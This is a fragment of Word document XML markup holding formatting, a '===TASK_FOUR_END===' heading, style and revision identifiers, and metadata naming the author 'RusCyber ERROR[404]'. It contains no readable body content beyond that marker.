    <w:p w14:paraId="11812016" w14:textId="77777777" w:rsidR="00FD1D85" w:rsidRPr="00911901" w:rsidRDefault="004B7F7D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00911901">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>===TASK_FOUR_END===</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="792A40CD" w14:textId="34216BF9" w:rsidR="005B5182" w:rsidRDefault="005B5182">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="519F85E4" w14:textId="77777777" w:rsidR="00986872" w:rsidRDefault="00986872">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Courier New" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B0EB460" w14:textId="0F82C0A4" w:rsidR="00F865B3" w:rsidRPr="00986872" w:rsidRDefault="00F865B3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Courier New" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Courier New" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00F865B3" w:rsidRPr="00986872" w:rsidSect="00485E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F09A7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="28BC1C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B082647"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="57D641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ED5790F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4DA4E4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85"/>
    <w:rsid w:val="000B6260"/>
    <w:rsid w:val="000F5D39"/>
    <w:rsid w:val="00137109"/>
    <w:rsid w:val="00160660"/>
    <w:rsid w:val="0017158B"/>
    <w:rsid w:val="00183C06"/>
    <w:rsid w:val="00194445"/>
    <w:rsid w:val="001D1074"/>
    <w:rsid w:val="001D21AA"/>
    <w:rsid w:val="00202AE6"/>
    <w:rsid w:val="00203E8A"/>
    <w:rsid w:val="00267069"/>
    <w:rsid w:val="00277B3D"/>
    <w:rsid w:val="00307242"/>
    <w:rsid w:val="003B6B75"/>
    <w:rsid w:val="003D3CBD"/>
    <w:rsid w:val="0041705D"/>
    <w:rsid w:val="00436173"/>
    <w:rsid w:val="00466A31"/>
    <w:rsid w:val="004756F9"/>
    <w:rsid w:val="00485EE5"/>
    <w:rsid w:val="004B7F7D"/>
    <w:rsid w:val="004C640F"/>
    <w:rsid w:val="004C72A2"/>
    <w:rsid w:val="004D7EA3"/>
    <w:rsid w:val="004E773A"/>
    <w:rsid w:val="00573647"/>
    <w:rsid w:val="00577B75"/>
    <w:rsid w:val="005B5182"/>
    <w:rsid w:val="005F0C3D"/>
    <w:rsid w:val="005F6487"/>
    <w:rsid w:val="006D76F9"/>
    <w:rsid w:val="00721676"/>
    <w:rsid w:val="00726179"/>
    <w:rsid w:val="00732422"/>
    <w:rsid w:val="00771DFA"/>
    <w:rsid w:val="00815B7A"/>
    <w:rsid w:val="008175DE"/>
    <w:rsid w:val="008337D1"/>
    <w:rsid w:val="00874FB4"/>
    <w:rsid w:val="00911901"/>
    <w:rsid w:val="00981CA3"/>
    <w:rsid w:val="00986872"/>
    <w:rsid w:val="0099146A"/>
    <w:rsid w:val="009B343B"/>
    <w:rsid w:val="00A472D6"/>
    <w:rsid w:val="00A64063"/>
    <w:rsid w:val="00AF510C"/>
    <w:rsid w:val="00BA3CF6"/>
    <w:rsid w:val="00BA3F70"/>
    <w:rsid w:val="00BE1A6B"/>
    <w:rsid w:val="00C0488D"/>
    <w:rsid w:val="00C23EDB"/>
    <w:rsid w:val="00C61688"/>
    <w:rsid w:val="00C82B35"/>
    <w:rsid w:val="00CC6EBD"/>
    <w:rsid w:val="00D9188A"/>
    <w:rsid w:val="00D93AA0"/>
    <w:rsid w:val="00DC2BC9"/>
    <w:rsid w:val="00E643FE"/>
    <w:rsid w:val="00E932F1"/>
    <w:rsid w:val="00EA6A88"/>
    <w:rsid w:val="00F1540E"/>
    <w:rsid w:val="00F649F8"/>
    <w:rsid w:val="00F65F18"/>
    <w:rsid w:val="00F865B3"/>
    <w:rsid w:val="00FB0BC5"/>
    <w:rsid w:val="00FD1D85"/>
    <w:rsid w:val="00FD32B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9730"/>
  <w15:docId w15:val="{E932E24A-4435-334C-AB49-D3E9C074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7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067">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="904604774">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1144153404">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1459031391">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1870529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1460</Words>
  <Characters>8326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9767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RusCyber ERROR[404]</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>RusCyber ERROR[404]</cp:lastModifiedBy>
  <cp:revision>19</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-04-02T10:24:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-04-04T19:13:00Z</dcterms:modified>
  <cp:category/>
</cp:coreProperties>
</file>